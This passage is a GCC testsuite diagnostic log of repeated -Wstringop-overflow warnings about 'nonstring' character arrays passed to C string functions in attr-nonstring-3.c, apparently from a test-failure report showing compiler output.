/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_sprintf(char* MemArrays*)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:110:3: warning: 'int sprintf(char* const char* ...)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:113:3: warning: 'int sprintf(char* const char* ...)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:116:3: warning: 'int sprintf(char* const char* ...)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_vsnprintf(char* size_t MemArrays* va_list)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:123:3: warning: 'int vsnprintf(char* size_t const char* va_list)' argument 3 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:126:3: warning: 'int vsnprintf(char* size_t const char* va_list)' argument 3 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:129:3: warning: 'int vsnprintf(char* size_t const char* va_list)' argument 3 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_vsprintf(char* MemArrays* va_list)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:136:3: warning: 'int vsprintf(char* const char* va_list)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:139:3: warning: 'int vsprintf(char* const char* va_list)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:142:3: warning: 'int vsprintf(char* const char* va_list)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_strcmp(MemArrays*)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:149:3: warning: 'int strcmp(const char* const char*)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:150:3: warning: 'int strcmp(const char* const char*)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:153:3: warning: 'int strcmp(const char* const char*)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:154:3: warning: 'int strcmp(const char* const char*)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:156:3: warning: 'int strcmp(const char* const char*)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:157:3: warning: 'int strcmp(const char* const char*)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:158:3: warning: 'int strcmp(const char* const char*)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:60:14: note: argument 'MemArrays::parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_strncmp_warn(MemArrays*)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:168:3: warning: 'int strncmp(const char* const char* size_t)' argument 2 declared attribute 'nonstring' is smaller than the specified bound 5 [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:169:3: warning: 'int strncmp(const char* const char* size_t)' argument 1 declared attribute 'nonstring' is smaller than the specified bound 5 [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_stpcpy(MemArrays*)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:203:3: warning: 'char* stpcpy(char* const char*)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:207:3: warning: 'char* stpcpy(char* const char*)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:210:3: warning: 'char* stpcpy(char* const char*)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_stpncpy_warn(MemArrays* unsigned int)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:249:3: warning: 'char* stpncpy(char* const char* size_t)' argument 2 declared attribute 'nonstring' is smaller than the specified bound 5 [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:256:3: warning: 'char* stpncpy(char* const char* size_t)' argument 2 declared attribute 'nonstring' is smaller than the specified bound 5 [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_strcat(MemArrays*)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:265:3: warning: 'char* strcat(char* const char*)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:269:3: warning: 'char* strcat(char* const char*)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:272:3: warning: 'char* strcat(char* const char*)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_strncat(MemArrays* unsigned int)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:281:3: warning: 'char* strncat(char* const char* size_t)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:285:3: warning: 'char* strncat(char* const char* size_t)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:288:3: warning: 'char* strncat(char* const char* size_t)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_strcpy(MemArrays*)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:297:3: warning: 'char* strcpy(char* const char*)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:301:3: warning: 'char* strcpy(char* const char*)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:304:3: warning: 'char* strcpy(char* const char*)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_strchr(MemArrays* int)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:329:3: warning: 'char* strchr(const char* int)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:332:3: warning: 'char* strchr(const char* int)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:335:3: warning: 'char* strchr(const char* int)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_strdup(MemArrays*)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:342:3: warning: 'char* strdup(const char*)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:345:3: warning: 'char* strdup(const char*)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:348:3: warning: 'char* strdup(const char*)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_stnrdup_warn(MemArrays*)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:379:3: warning: 'char* strndup(const char* size_t)' argument 1 declared attribute 'nonstring' is smaller than the specified bound 5 [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:381:3: warning: 'char* strndup(const char* size_t)' argument 1 declared attribute 'nonstring' is smaller than the specified bound 5 [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_strlen(MemArrays* char* size_t)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:389:3: warning: 'size_t strlen(const char*)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:392:3: warning: 'size_t strlen(const char*)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:395:3: warning: 'size_t strlen(const char*)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:397:3: warning: 'size_t strlen(const char*)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:386:46: note: argument 's' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:406:5: warning: 'size_t strlen(const char*)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:404:10: note: argument 'a' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:421:5: warning: 'size_t strlen(const char*)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:417:11: note: argument 'p' declared here
output is:
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_printf(MemArrays*)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:71:3: warning: 'int printf(const char* ...)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:74:3: warning: 'int printf(const char* ...)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:77:3: warning: 'int printf(const char* ...)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_puts(MemArrays*)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:84:3: warning: 'int puts(const char*)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:87:3: warning: 'int puts(const char*)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:90:3: warning: 'int puts(const char*)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_snprintf(char* size_t MemArrays*)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:97:3: warning: 'int snprintf(char* size_t const char* ...)' argument 3 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:100:3: warning: 'int snprintf(char* size_t const char* ...)' argument 3 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:103:3: warning: 'int snprintf(char* size_t const char* ...)' argument 3 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_sprintf(char* MemArrays*)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:110:3: warning: 'int sprintf(char* const char* ...)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:113:3: warning: 'int sprintf(char* const char* ...)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:116:3: warning: 'int sprintf(char* const char* ...)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_vsnprintf(char* size_t MemArrays* va_list)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:123:3: warning: 'int vsnprintf(char* size_t const char* va_list)' argument 3 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:126:3: warning: 'int vsnprintf(char* size_t const char* va_list)' argument 3 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:129:3: warning: 'int vsnprintf(char* size_t const char* va_list)' argument 3 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_vsprintf(char* MemArrays* va_list)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:136:3: warning: 'int vsprintf(char* const char* va_list)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:139:3: warning: 'int vsprintf(char* const char* va_list)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:142:3: warning: 'int vsprintf(char* const char* va_list)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_strcmp(MemArrays*)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:149:3: warning: 'int strcmp(const char* const char*)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:150:3: warning: 'int strcmp(const char* const char*)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:153:3: warning: 'int strcmp(const char* const char*)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:154:3: warning: 'int strcmp(const char* const char*)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:156:3: warning: 'int strcmp(const char* const char*)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:157:3: warning: 'int strcmp(const char* const char*)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:158:3: warning: 'int strcmp(const char* const char*)' argument 1 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:60:14: note: argument 'MemArrays::parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_strncmp_warn(MemArrays*)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:168:3: warning: 'int strncmp(const char* const char* size_t)' argument 2 declared attribute 'nonstring' is smaller than the specified bound 5 [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:169:3: warning: 'int strncmp(const char* const char* size_t)' argument 1 declared attribute 'nonstring' is smaller than the specified bound 5 [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_stpcpy(MemArrays*)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:203:3: warning: 'char* stpcpy(char* const char*)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:207:3: warning: 'char* stpcpy(char* const char*)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:54:7: note: argument 'parr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:210:3: warning: 'char* stpcpy(char* const char*)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_stpncpy_warn(MemArrays* unsigned int)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:249:3: warning: 'char* stpncpy(char* const char* size_t)' argument 2 declared attribute 'nonstring' is smaller than the specified bound 5 [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:256:3: warning: 'char* stpncpy(char* const char* size_t)' argument 2 declared attribute 'nonstring' is smaller than the specified bound 5 [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:59:15: note: argument 'MemArrays::arr' declared here
